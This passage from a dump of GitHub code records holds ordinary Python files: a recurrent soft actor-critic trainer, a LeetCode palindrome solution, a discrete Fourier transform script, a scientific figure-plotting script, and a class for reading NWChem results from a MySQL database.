dim=-2).detach()\n\n        return hi_lst, ho_lst, s_lst, a_lst, la_lst, r_lst, ns_lst, d_lst\n\n    def __len__(\n            self):  # cannot work in multiprocessing case, len(replay_buffer) is not available in proxy of manager!\n        return len(self.buffer)\n\n    def get_length(self):\n        return len(self.buffer)\n\n\n\n\n\n\nclass QNetworkGRU(QNetworkBase):\n    def __init__(self, state_space, action_space, hidden_dim, activation=F.relu, output_activation=None):\n        super().__init__(state_space, action_space, activation)\n        self.hidden_dim = 
hidden_dim\n\n self.linear1 = nn.Linear(self._state_dim+self._action_dim, hidden_dim)\n self.linear2 = nn.Linear(self._state_dim+self._action_dim, hidden_dim)\n self.lstm1 = nn.GRU(hidden_dim, hidden_dim)\n self.linear3 = nn.Linear(2*hidden_dim, hidden_dim)\n self.linear4 = nn.Linear(hidden_dim, 1)\n # weights initialization\n self.linear4.apply(linear_weights_init)\n \n def forward(self, state, action, last_action, hidden_in):\n \"\"\" \n state shape: (batch_size, sequence_length, state_dim)\n output shape: (batch_size, sequence_length, 1)\n for lstm needs to be permuted as: (sequence_length, batch_size, state_dim)\n \"\"\"\n state = state.permute(1,0,2)\n action = action.permute(1,0,2)\n last_action = last_action.permute(1,0,2)\n # branch 1\n fc_branch = torch.cat([state, action], -1) \n fc_branch = self.activation(self.linear1(fc_branch))\n # branch 2\n lstm_branch = torch.cat([state, last_action], -1) \n lstm_branch = self.activation(self.linear2(lstm_branch)) # linear layer for 3d input only applied on the last dim\n lstm_branch, lstm_hidden = self.lstm1(lstm_branch, hidden_in) # no activation after lstm\n # merged\n merged_branch=torch.cat([fc_branch, lstm_branch], -1) \n\n x = self.activation(self.linear3(merged_branch))\n x = self.linear4(x)\n x = x.permute(1,0,2) # back to same axes as input \n return x, lstm_hidden # lstm_hidden is actually tuple: (hidden, cell) \n\n\n\n\nclass SAC_PolicyNetworkGRU(PolicyNetworkBase):\n def __init__(self, state_space, action_space, hidden_size, action_range=1., init_w=3e-3, log_std_min=-20, log_std_max=2):\n super().__init__(state_space, action_space, action_range=action_range)\n \n self.log_std_min = log_std_min\n self.log_std_max = log_std_max\n self.hidden_size = hidden_size\n \n self.linear1 = nn.Linear(self._state_dim, hidden_size)\n self.linear2 = nn.Linear(self._state_dim+self._action_dim, hidden_size)\n self.lstm1 = nn.GRU(hidden_size, hidden_size)\n self.linear3 = nn.Linear(2*hidden_size, hidden_size)\n self.linear4 = nn.Linear(hidden_size, hidden_size)\n\n self.mean_linear = nn.Linear(hidden_size, self._action_dim)\n self.mean_linear.weight.data.uniform_(-init_w, init_w)\n self.mean_linear.bias.data.uniform_(-init_w, init_w)\n \n self.log_std_linear = nn.Linear(hidden_size, self._action_dim)\n self.log_std_linear.weight.data.uniform_(-init_w, init_w)\n self.log_std_linear.bias.data.uniform_(-init_w, init_w)\n\n\n def forward(self, state, last_action, hidden_in):\n \"\"\" \n state shape: (batch_size, sequence_length, state_dim)\n output shape: (batch_size, sequence_length, action_dim)\n for lstm needs to be permuted as: (sequence_length, batch_size, -1)\n \"\"\"\n state = state.permute(1,0,2)\n last_action = last_action.permute(1,0,2)\n # branch 1\n fc_branch = torch.tanh(self.linear1(state))\n # branch 2\n lstm_branch = torch.cat([state, last_action], -1)\n lstm_branch = F.relu(self.linear2(lstm_branch))\n lstm_branch, lstm_hidden = self.lstm1(lstm_branch, hidden_in) # no activation after lstm\n # merged\n merged_branch=torch.cat([fc_branch, lstm_branch], -1) \n x = F.relu(self.linear3(merged_branch))\n x = F.relu(self.linear4(x))\n x = x.permute(1,0,2) # permute back\n\n mean = self.mean_linear(x)\n # mean = F.leaky_relu(self.mean_linear(x))\n log_std = self.log_std_linear(x)\n log_std = torch.clamp(log_std, self.log_std_min, self.log_std_max)\n \n return mean, log_std, lstm_hidden\n \n def evaluate(self, state, last_action, hidden_in, epsilon=1e-6):\n '''\n generate sampled action with state as input wrt the policy network;\n '''\n 
mean, log_std, hidden_out = self.forward(state, last_action, hidden_in)\n std = log_std.exp() # no clip in evaluation, clip affects gradients flow\n \n normal = Normal(0, 1)\n z = normal.sample(mean.shape)\n action_0 = torch.tanh(mean + std * z.cuda()) # TanhNormal distribution as actions; reparameterization trick\n action = self.action_range * action_0\n log_prob = Normal(mean, std).log_prob(mean + std * z.cuda()) - torch.log(\n 1. - action_0.pow(2) + epsilon) - np.log(self.action_range)\n # both dims of normal.log_prob and -log(1-a**2) are (N,dim_of_action);\n # the Normal.log_prob outputs the same dim of input features instead of 1 dim probability,\n # needs sum up across the features dim to get 1 dim prob; or else use Multivariate Normal.\n log_prob = log_prob.sum(dim=-1, keepdim=True)\n return action, log_prob, z, mean, log_std, hidden_out\n\n def get_action(self, state, last_action, hidden_in, deterministic=True):\n state = torch.FloatTensor(state).unsqueeze(0).unsqueeze(0).cuda() # increase 2 dims to match with training data\n last_action = torch.FloatTensor(last_action).unsqueeze(0).unsqueeze(0).cuda()\n mean, log_std, hidden_out = self.forward(state, last_action, hidden_in)\n std = log_std.exp()\n \n normal = Normal(0, 1)\n z = normal.sample(mean.shape).cuda()\n action = self.action_range * torch.tanh(mean + std * z)\n\n action = self.action_range * torch.tanh(mean).detach().cpu().numpy() if deterministic else \\\n action.detach().cpu().numpy()\n return action[0][0], hidden_out\n\n\n\n\nclass SAC_Trainer():\n def __init__(self, replay_buffer, state_space, action_space, hidden_dim, action_range, gamma, soft_q_lr, policy_lr, alpha_lr, batch_size, update_itr, reward_scale, target_entropy, soft_tau, train_freq):\n\n\n self.gamma = gamma\n self.batch_size = batch_size\n self.update_itr = update_itr\n self.hidden_dim = hidden_dim\n self.reward_scale = reward_scale\n self.target_entropy = target_entropy\n self.soft_tau = soft_tau\n self.train_freq = train_freq\n\n self.replay_buffer = replay_buffer\n self.soft_q_net1 = QNetworkGRU(state_space, action_space, hidden_dim).to(device)\n self.soft_q_net2 = QNetworkGRU(state_space, action_space, hidden_dim).to(device)\n self.target_soft_q_net1 = QNetworkGRU(state_space, action_space, hidden_dim).to(device)\n self.target_soft_q_net2 = QNetworkGRU(state_space, action_space, hidden_dim).to(device)\n self.policy_net = SAC_PolicyNetworkGRU(state_space, action_space, hidden_dim, action_range).to(device)\n self.log_alpha = torch.zeros(1, dtype=torch.float32, requires_grad=True, device=device)\n #print('Soft Q Network (1,2): ', self.soft_q_net1)\n #print('Policy Network: ', self.policy_net)\n\n for target_param, param in zip(self.target_soft_q_net1.parameters(), self.soft_q_net1.parameters()):\n target_param.data.copy_(param.data)\n for target_param, param in zip(self.target_soft_q_net2.parameters(), self.soft_q_net2.parameters()):\n target_param.data.copy_(param.data)\n\n self.soft_q_criterion1 = nn.MSELoss()\n self.soft_q_criterion2 = nn.MSELoss()\n\n # soft_q_lr = 0.0015\n # policy_lr = 0.0015\n # alpha_lr = 0.0015\n\n self.soft_q_optimizer1 = optim.Adam(self.soft_q_net1.parameters(), lr=soft_q_lr)\n self.soft_q_optimizer2 = optim.Adam(self.soft_q_net2.parameters(), lr=soft_q_lr)\n self.policy_optimizer = optim.Adam(self.policy_net.parameters(), lr=policy_lr)\n self.alpha_optimizer = optim.Adam([self.log_alpha], lr=alpha_lr)\n\n \n def update(self, batch_size, reward_scale=10., auto_entropy=True, target_entropy=-2, gamma=0.975,soft_tau=1e-2):\n 
hidden_in, hidden_out, state, action, last_action, reward, next_state, done = self.replay_buffer.sample(batch_size)\n # print('sample:', state, action, reward, done)\n\n batch_size = self.batch_size\n reward_scale = self.reward_scale\n gamma = self.gamma\n target_entropy = self.target_entropy\n soft_tau = self.soft_tau\n\n\n state = torch.FloatTensor(np.array(state)).to(device)\n next_state = torch.FloatTensor(np.array(next_state)).to(device)\n action = torch.FloatTensor(np.array(action)).to(device)\n last_action = torch.FloatTensor(np.array(last_action)).to(device)\n reward = torch.FloatTensor(np.array(reward)).unsqueeze(-1).to(device) # reward is single value, unsqueeze() to add one dim to be [reward] at the sample dim;\n done = torch.FloatTensor(np.float32(done)).unsqueeze(-1).to(device)\n\n\n # state = torch.FloatTensor(state).to(device)\n # next_state = torch.FloatTensor(next_state).to(device)\n # action = torch.FloatTensor(action).to(device)\n # last_action = torch.FloatTensor(last_action).to(device)\n # reward = torch.FloatTensor(reward).unsqueeze(-1).to(device) # reward is single value, unsqueeze() to add one dim to be [reward] at the sample dim;\n # done = torch.FloatTensor(np.float32(done)).unsqueeze(-1).to(device)\n\n predicted_q_value1, _ = self.soft_q_net1(state, action, last_action, hidden_in)\n predicted_q_value2, _ = self.soft_q_net2(state, action, last_action, hidden_in)\n new_action, log_prob, z, mean, log_std, _ = self.policy_net.evaluate(state, last_action, hidden_in)\n new_next_action, next_log_prob, _, _, _, _ = self.policy_net.evaluate(next_state, action, hidden_out)\n reward = reward_scale * (reward - reward.mean(dim=0)) / (reward.std(dim=0) + 1e-6) # normalize with batch mean and std; plus a small number to prevent numerical problem\n # Updating alpha wrt entropy\n # alpha = 0.0 # trade-off between exploration (max entropy) and exploitation (max Q) \n if auto_entropy is True:\n alpha_loss = -(self.log_alpha * (log_prob + target_entropy).detach()).mean()\n # print('alpha loss: ',alpha_loss)\n self.alpha_optimizer.zero_grad()\n alpha_loss.backward()\n self.alpha_optimizer.step()\n self.alpha = self.log_alpha.exp()\n else:\n self.alpha = 1.\n alpha_loss = 0\n\n # Training Q Function\n predict_target_q1, _ = self.target_soft_q_net1(next_state, new_next_action, action, hidden_out)\n predict_target_q2, _ = self.target_soft_q_net2(next_state, new_next_action, action, hidden_out)\n target_q_min = torch.min(predict_target_q1, predict_target_q2) - self.alpha * next_log_prob\n target_q_value = reward + (1 - done) * gamma * target_q_min # if done==1, only reward\n q_value_loss1 = self.soft_q_criterion1(predicted_q_value1, target_q_value.detach()) # detach: no gradients for the variable\n q_value_loss2 = self.soft_q_criterion2(predicted_q_value2, target_q_value.detach())\n\n\n self.soft_q_optimizer1.zero_grad()\n q_value_loss1.backward()\n self.soft_q_optimizer1.step()\n self.soft_q_optimizer2.zero_grad()\n q_value_loss2.backward()\n self.soft_q_optimizer2.step() \n\n # Training Policy Function\n predict_q1, _= self.soft_q_net1(state, new_action, last_action, hidden_in)\n predict_q2, _ = self.soft_q_net2(state, new_action, last_action, hidden_in)\n predicted_new_q_value = torch.min(predict_q1, predict_q2)\n policy_loss = (self.alpha * log_prob - predicted_new_q_value).mean()\n\n self.policy_optimizer.zero_grad()\n policy_loss.backward()\n self.policy_optimizer.step()\n \n # print('q loss: ', q_value_loss1, q_value_loss2)\n # print('policy loss: ', policy_loss )\n\n\n # Soft 
update the target value net\n for target_param, param in zip(self.target_soft_q_net1.parameters(), self.soft_q_net1.parameters()):\n target_param.data.copy_( # copy data value into target parameters\n target_param.data * (1.0 - soft_tau) + param.data * soft_tau\n )\n for target_param, param in zip(self.target_soft_q_net2.parameters(), self.soft_q_net2.parameters()):\n target_param.data.copy_( # copy data value into target parameters\n target_param.data * (1.0 - soft_tau) + param.data * soft_tau\n )\n return predicted_new_q_value.mean()\n\n def save_model(self, path):\n torch.save(self.soft_q_net1.state_dict(), path+'/GRU_q1')\n torch.save(self.soft_q_net2.state_dict(), path+'/GRU_q2')\n torch.save(self.policy_net.state_dict(), path+'/GRU_policy')\n\n def load_model(self, path):\n self.soft_q_net1.load_state_dict(torch.load(path+'/GRU_q1'))\n self.soft_q_net2.load_state_dict(torch.load(path+'/GRU_q2'))\n self.policy_net.load_state_dict(torch.load(path+'/GRU_policy'))\n\n self.soft_q_net1.eval()\n self.soft_q_net2.eval()\n self.policy_net.eval()\n\n\ndef plot(rewards):\n # clear_output(True)\n plt.figure(figsize=(20,5))\n plt.plot(rewards)\n plt.savefig('sac_v2_GRU.png')\n # plt.show()\n\n","repo_name":"CiciDu/Multifirefly-Project","sub_path":"functions/GRU_functions.py","file_name":"GRU_functions.py","file_ext":"py","file_size_in_byte":15707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32161078955","text":"# Question: https://leetcode.com/explore/featured/card/august-leetcoding-challenge/550/week-2-august-8th-august-14th/3423/\r\n\r\n\"\"\"\r\nGiven a string which consists of lowercase or uppercase letters, find the length of the longest palindromes that can be built with those letters.\r\nThis is case sensitive, for example \"Aa\" is not considered a palindrome here.\r\nNote: Assume the length of given string will not exceed 1,010.\r\n\r\nExample:\r\n Input: \"abccccdd\"\r\n Output: 7\r\n Explanation: One longest palindrome that can be built is \"dccaccd\", whose length is 7.\r\n\"\"\"\r\n\r\nfrom collections import Counter\r\n\r\nclass Solution:\r\n def longestPalindrome(self, s: str) -> int:\r\n counter = Counter(s)\r\n ans = 0\r\n any_odd = False\r\n \r\n for i in counter:\r\n if not any_odd and counter[i]&1:\r\n any_odd = True\r\n ans += 1\r\n ans += 2 * (counter[i]//2)\r\n \r\n return ans","repo_name":"patel-himanshu/leetcode-problems","sub_path":"2020 - August LeetCoding Challenge/409-longest-palindrome.py","file_name":"409-longest-palindrome.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33744246112","text":"import sys\nimport math\nimport cmath\n\ndef dft(varray):\n n = len(varray)\n f = list()\n for t in range(0, n):\n s = 0\n for x in range(0, n):\n s += varray[x] * cmath.exp(-1j * 2*math.pi/n * t * x)\n f.append(s)\n return f\n\ndef invdft(varray):\n n = len(varray)\n f = list()\n for t in range(0, n):\n s = 0\n for x in range(0, n):\n s += varray[x] * cmath.exp(1j * 2*math.pi/n * t * x)\n f.append(s/n)\n return f\n\nif len(sys.argv) != 2 :\n exit\n\nprint(sys.argv[1])\n\ndata = list()\nwith open(sys.argv[1]) as f:\n for aline in f:\n print(aline.strip())\n data.append(float(aline))\n\nn = 2 ** math.ceil(math.log(len(data),2))\nfor i in range(len(data), n):\n data.append(0)\n\nprint()\ntdata = dft(data)\nfor val in tdata:\n 
print(round(abs(val),4))\n\n#print(invfft(tdata))","repo_name":"una1veritas/Algorithm-Design","sub_path":"PyFFT/DFT/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"37944428309","text":"\"\"\"\nPlot Figure 5. Simply run\n\n    $ python plot_fig5.py\n\nMake sure to run\n\n    $ python fig5a.py 200\n\nand \n\n    $ python fig5bc_6a.py 1e8 200\n    $ python fig5bc_6a.py 1e9 200\n\nbefore running this code.\n\nAuthor: Matheus Rolim Sales\nLast modified: 05/12/2022\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom functions import plot_params\nimport matplotlib as mpl\nfrom scipy.interpolate import interp1d\nimport os\n\ncolor1 = 'r'\ncolor2 = 'lime'\ncolor3 = 'gold'\n\ncolor1 = 'dodgerblue'\ncolor2 = 'red'\ncolor3 = 'lime'\n\nmarker = 'x'\nms = 0.01\n\nplot_params(fontsize=32, tick_labelsize=30, axes_labelsize=33)\nmpl.rcParams['axes.linewidth'] = 1.6 #set the value globally\nfig, ax = plt.subplots(1, 3, facecolor='w', figsize=(22, 6))\n\n####################\n# --- Fig 5(a) --- #\n####################\nn = 200\nNtot = int(1e10)\nexponent = int(np.log10(Ntot))\nbase = int(Ntot/10**exponent)\nxbox = 0.0062\nybox = 0.93\nbbox = {'linewidth': 0.0, 'facecolor': 'white', 'alpha': 1.0, 'pad': 1}\npath = 'Data/'\ndatafile = path + 'fig5a_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\n# Checks if datafile exists\nif not os.path.isfile(datafile):\n    import sys\n    print('%s does not exist!\\nDid you run fig5a.py?\\nStopping execution...' % (datafile))\n    sys.exit()\nprint('Extracting data from %s...' % datafile)\ndf = pd.read_csv(datafile, header=None, delim_whitespace=True)\nX = np.array(df[0])\n# Fig 5bc - blue\ns01a = 0.6\nsf1a = 0.8\n# Fig 5bc - red\ns01b = 1.25\nsf1b = 1.33\n# Fig 5bc - green\ns01c = sf1b\nsf1c = 1.48\n# Fig 5bc - black\ns02 = sf1c\nsf2 = 1.55\nbin_heights, bin_borders, _ = ax[0].hist(X, density=True, histtype='step', color='k', bins='auto')\nbin_widths = np.diff(bin_borders)\nbin_centers = bin_borders[:-1] + bin_widths / 2\nx = bin_centers\ny = bin_heights\nprint(\"Interpolating the data...\")\nf = interp1d(x, y, kind='cubic')\nprint('Plotting the data...')\nax[0].fill_between(np.linspace(s01a, sf1a), f(np.linspace(s01a, sf1a)), alpha=0.95, color=color1)\nax[0].fill_between(np.linspace(s01b, sf1b), f(np.linspace(s01b, sf1b)), alpha=0.95, color=color2)\nax[0].fill_between(np.linspace(s01c, sf1c), f(np.linspace(s01c, sf1c)), alpha=0.95, color=color3)\nax[0].fill_between(np.linspace(s02, sf2), f(np.linspace(s02, sf2)), alpha=0.95, color='k')\n_ = ax[0].set_xlabel('$\\\\mathrm{RTE}(%i)$' % n), ax[0].set_ylabel('$P(\\\\mathrm{RTE}(%i))$' % n), ax[0].set_xlim(0, 4), ax[0].set_yticks([0, 0.5, 1, 1.5])\nax[0].text(xbox, ybox, '(a)', transform=ax[0].transAxes, bbox=bbox)\nax[0].set_xticks([0, 1, 2, 3, 4])\n# --- Inset --- #\nax_ins = ax[0].inset_axes([0.145, 0.4, 0.525, 0.45])\nax_ins.plot(np.arange(len(X)), X, 'k-', lw=0.1)\n#ax[0].set_xscale('log')\nax_ins.set_xlim(40000, 70000)\nax_ins.set_xticks([40000, 70000])\n#ax_ins.set_xticklabels(['$4.0\\\\times10^4$', '$8.0\\\\times10^4$'])\nax_ins.set_xlabel('$i$', fontsize=23)\nax_ins.set_ylabel('$\\\\mathrm{RTE}(200)$', fontsize=23)\nax_ins.set_yticks([0, 2.5, 5])\nax_ins.tick_params(axis='x', which='major', pad=10, labelsize=20)\nax_ins.tick_params(axis='y', which='major', labelsize=20)\nprint()\n\n####################\n# --- Fig 5(b) --- #\n####################\n\nn = 200\nNtot = int(1e8)\nexponent = np.log10(Ntot)\nbase = int(Ntot/10**exponent)\n\ndatafile1a = path + 'fig5b_blue_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile1b = path + 'fig5b_red_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile1c = path + 'fig5b_green_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile2 = path + 'fig5b_black_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\n\n# Checks if datafile exists\nif not os.path.isfile(datafile2):\n    import sys\n    print('%s does not exist!\\nDid you run fig5bc_6a.py?\\nStopping execution...' % (datafile2))\n    sys.exit()\nprint('Extracting data from %s...' % datafile1c)\ndf = pd.read_csv(datafile1c, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nprint('Plotting the data...')\nax[1].plot(x, y, 'x', c=color3, markersize=ms)\n\nprint('Extracting data from %s...' % datafile1b)\ndf = pd.read_csv(datafile1b, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nprint('Plotting the data...')\nax[1].plot(x, y, 'x', c=color2, markersize=ms)\n\nprint('Extracting data from %s...' % datafile1a)\ndf = pd.read_csv(datafile1a, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nprint('Plotting the data...')\nax[1].plot(x, y, 'x', c=color1, markersize=ms)\n\nprint('Extracting data from %s...' % datafile2)\ndf = pd.read_csv(datafile2, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nprint('Plotting the data...')\nax[1].plot(x, y, 'x', c='k', markersize=ms)\n\n\nax[1].text(xbox, ybox, '(b)', transform=ax[1].transAxes, bbox=bbox)\n\nLW = 1.5\ncolor = 'red'\nax[1].plot([1.45, 2.2], [-0.2, -0.2], '--', c=color, lw=LW)\nax[1].plot([2.2, 2.2], [-0.2, 1.7], '--', c=color, lw=LW)\nax[1].plot([1.45, 2.2], [1.7, 1.7], '--', c=color, lw=LW)\nax[1].plot([1.45, 1.45], [1.7, -0.2], '--', c=color, lw=LW)\n\n_ = ax[1].set_xlim(-np.pi, np.pi), ax[1].set_ylim(-np.pi, np.pi)\n_ = ax[1].set_xticks([-np.pi, 0, np.pi]), ax[1].set_yticks([-np.pi, 0, np.pi])\n_ = ax[1].set_xticklabels(['$-\\\\pi$', '$0$', '$\\\\pi$']), ax[1].set_yticklabels(['$-\\\\pi$', '$0$', '$\\\\pi$']), \n_ = ax[1].set_ylabel('$p$')\n_ = ax[1].set_xlabel('$x$')\nprint()\n\n####################\n# --- Fig 5(c) --- #\n####################\n\nms = ms/2\nn = 200\nNtot = int(1e9)\nexponent = np.log10(Ntot)\nbase = int(Ntot/10**exponent)\n\nxi = 1.45\nxf = 2.2\nyi = -0.2\nyf = 1.7\n\ndatafile1a = path + 'fig5b_blue_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile1b = path + 'fig5b_red_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile1c = path + 'fig5b_green_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile2 = path + 'fig5b_black_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\n\n# Checks if datafile exists\nif not os.path.isfile(datafile2):\n    import sys\n    print('%s does not exist!\\nDid you run fig5a.py?\\nStopping execution...' % (datafile2))\n    sys.exit()\n\nprint('Extracting data from %s...' % datafile1c)\ndf = pd.read_csv(datafile1c, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nX = x[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nY = y[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nx = X\ny = Y\nprint('Plotting the data...')\nax[2].plot(x, y, 'x', c=color3, markersize=ms)\n\nprint('Extracting data from %s...' 
% datafile1b)\ndf = pd.read_csv(datafile1b, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nX = x[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nY = y[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nx = X\ny = Y\nprint('Plotting the data...')\nax[2].plot(x, y, 'x', c=color2, markersize=ms)\n\nprint('Extracting data from %s...' % datafile1a)\ndf = pd.read_csv(datafile1a, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nX = x[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nY = y[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nx = X\ny = Y\nprint('Plotting the data...')\nax[2].plot(x, y, 'x', c=color1, markersize=ms)\n\nprint('Extracting data from %s...' % datafile2)\ndf = pd.read_csv(datafile2, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nX = x[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nY = y[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nx = X\ny = Y\nprint('Plotting the data...')\nax[2].plot(x, y, 'x', c='k', markersize=ms)\n\nax[2].text(xbox, ybox, '(c)', transform=ax[2].transAxes, bbox=bbox)\n\n_ = ax[2].set_xlim(xi, xf), ax[2].set_ylim(yi, yf)\n_ = ax[2].set_xticks([xi, xf]), ax[2].set_yticks([yi, yf])\n_ = ax[2].set_xlabel('$x$')\n\nfigname = 'Figures/fig5.png'\nax[0].tick_params(axis='x', which='major', pad=10)\nax[1].tick_params(axis='x', which='major', pad=10)\nax[2].tick_params(axis='x', which='major', pad=10)\n_ = plt.subplots_adjust(left=0.05, bottom=0.18, right=0.98, top=0.966, hspace=0.27, wspace=0.2)\nprint('Saving in %s...' % figname)\nplt.savefig(figname, dpi=250, format='png')\nprint('Done.')\n","repo_name":"mrolims/StickinessRecurrencePlots","sub_path":"plot_fig5.py","file_name":"plot_fig5.py","file_ext":"py","file_size_in_byte":7984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42790729706","text":"from nwchem_parse import nwchem_parser\nfrom nwchem_parse import nw_atom, nw_orbital\nimport mysql.connector\nfrom mysql.connector import Error\nimport re\n\n\"\"\"\nExample run:\n\nfn = Path to NWchem output file\ndb = Name of schema in database (Should be same as prefix ex. La-9+\npw = Your password to the database\nusr = Your username for the database\n\n# Stores data in database\nstore_data = database_storage(fn, usr, pw, db)\n\ndb = Name of schema in database (Should be same as prefix ex. 
La-9+\npw = Your password to the database\nusr = Your username for the database\n\n# Initializes data retrieval class\nretrieve_data = database_retrieval(db, usr, pw)\n\n# Get all data from schema\nretrieve_data.get_all()\n\"\"\"\n\nclass database_retrieval():\n _runinfo = dict()\n _atom_dict = dict()\n _orbital_dict_alpha = dict()\n _orbital_dict_beta = dict()\n _energies = dict()\n _total_density = dict()\n _spin_density = dict()\n _gradient_dict = dict()\n _overlap_dict = dict()\n connection = 0\n\n # Getters and Setters\n @property\n def energies(self): return self._energies\n @energies.setter\n def energies(self, val): self._energies = val\n\n @property\n def atom_dict(self): return self._atom_dict\n @atom_dict.setter\n def atom_dict(self, val): self._atom_dict = val\n\n @property\n def runinfo(self): return self._runinfo\n\n @runinfo.setter\n def runinfo(self, val): self._runinfo = val\n\n @property\n def orbital_dict_alpha(self): return self._orbital_dict_alpha\n\n @orbital_dict_alpha.setter\n def orbital_dict_alpha(self, val): self._orbital_dict_alpha = val\n\n @property\n def orbital_dict_beta(self): return self._orbital_dict_beta\n\n @orbital_dict_beta.setter\n def orbital_dict_beta(self, val): self._orbital_dict_beta = val\n\n @property\n def total_density(self): return self._total_density\n\n @total_density.setter\n def total_density(self, val): self._total_density = val\n\n @property\n def spin_density(self): return self._spin_density\n\n @spin_density.setter\n def spin_density(self, val): self._spin_density = val\n\n @property\n def gradient_dict(self): return self._gradient_dict\n\n @gradient_dict.setter\n def overlap_dict(self, val): self._gradient_dict = val\n\n @property\n def overlap_dict(self): return self._overlap_dict\n\n @overlap_dict.setter\n def overlap_dict(self, val): self._overlap_dict = val\n\n def __init__(self, db, usr, pwd):\n self.db = db\n self.usr = usr\n self.pwd = pwd\n self.connection = create_db_connection(\"%\", usr, pwd, db)\n\n def get_all(self):\n self._runinfo = self.get_run_info(self.connection)\n self._atom_dict = self.get_geo_info(self.connection)\n self._energies = self.get_energy(self.connection)\n self._total_density = self.get_totalDensity(self.connection)\n self._spin_density = self.get_spinDensity(self.connection)\n self._orbital_dict_alpha = self.get_alphaOrbital_info(self.connection)\n self._orbital_dict_beta = self.get_betaOrbital_info(self.connection)\n self._gradient_dict = dict()\n self._overlap_dict = self.get_overlap_info(self.connection)\n\n def get_run_info(self, connection):\n _runinfo = dict()\n get = \"\"\" SELECT * FROM run_info; \"\"\"\n results = read_query(connection, get)\n _runinfo['prefix'] = results[0][0]\n _runinfo['date'] = results[0][1]\n _runinfo['NW_branch'] = float(results[0][2])\n _runinfo['NW_revision'] = float(results[0][3])\n _runinfo['GA_revision'] = float(results[0][4])\n\n return _runinfo\n\n def get_geo_info(self, connection):\n _atoms = dict()\n get = \"\"\" SELECT * FROM geometry; \"\"\"\n results = read_query(connection, get)\n for at in results:\n new_atom = nw_atom(id=float(at[0]), species=at[1], charge=float(at[2]))\n _atoms[new_atom.id] = new_atom\n\n return _atoms\n\n def get_energy(self, connection):\n _energy = dict()\n get = \"\"\" SELECT * FROM initial_energy; \"\"\"\n results = read_query(connection, get)\n\n def get_totalDensity(self, connection):\n _total = dict()\n get = \"\"\" SELECT * FROM total_density_mulliken; \"\"\"\n results = read_query(connection, get)\n data = []\n for at in 
results:\n res = at[3].strip('][').split(' ')\n for i in range(len(res)):\n res[i] = float(res[i])\n new_atom = nw_atom(id=float(at[0]), species=at[1], charge=float(at[2]), shell_charges=res)\n data.append(new_atom)\n\n _total['Mulliken Population Analysis'] = data\n\n get = \"\"\" SELECT * FROM total_density_lowdin; \"\"\"\n results = read_query(connection, get)\n data = []\n for at in results:\n res = at[3].strip('][').split(' ')\n for i in range(len(res)):\n res[i] = float(res[i])\n new_atom = nw_atom(id=float(at[0]), species=at[1], charge=float(at[2]), shell_charges=res)\n data.append(new_atom)\n\n _total['Lowdin Population Analysis'] = data\n\n return _total\n\n def get_spinDensity(self, connection):\n _spin = dict()\n get = \"\"\" SELECT * FROM spin_density_mulliken; \"\"\"\n results = read_query(connection, get)\n data = []\n for at in results:\n res = at[3].strip('][').split(' ')\n for i in range(len(res)):\n res[i] = float(res[i])\n new_atom = nw_atom(id=float(at[0]), species=at[1], charge=float(at[2]), shell_charges=res)\n data.append(new_atom)\n\n _spin['Mulliken Population Analysis'] = data\n\n get = \"\"\" SELECT * FROM spin_density_lowdin; \"\"\"\n results = read_query(connection, get)\n data = []\n for at in results:\n res = at[3].strip('][').split(' ')\n for i in range(len(res)):\n res[i] = float(res[i])\n new_atom = nw_atom(id=float(at[0]), species=at[1], charge=float(at[2]), shell_charges=res)\n data.append(new_atom)\n\n _spin['Lowdin Population Analysis'] = data\n return _spin\n\n def get_alphaOrbital_info(self, connection):\n alpha = dict()\n get = \"\"\" SELECT * FROM alpha_orbital; \"\"\"\n results = read_query(connection, get)\n for orbital in results:\n basatoms = []\n basefuncs = []\n for w in orbital[3].split(\") \"):\n basisfun = re.split(',\\s', w)\n basisfun[0] = float(basisfun[0].replace(\"(\", \"\"))\n basisfun[1] = float(basisfun[1].replace(\" \", \"\"))\n whitelist = set('abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n basisfun[3] = ''.join(filter(whitelist.__contains__, basisfun[3]))\n basisfun[3] = basisfun[3].strip()\n t = re.search(r'\\((.*?)\\)', basisfun[2]).group(1)\n t = t.split(\",\")\n new_atom = nw_atom(float(t[0]), t[1])\n basisfun[2] = new_atom\n 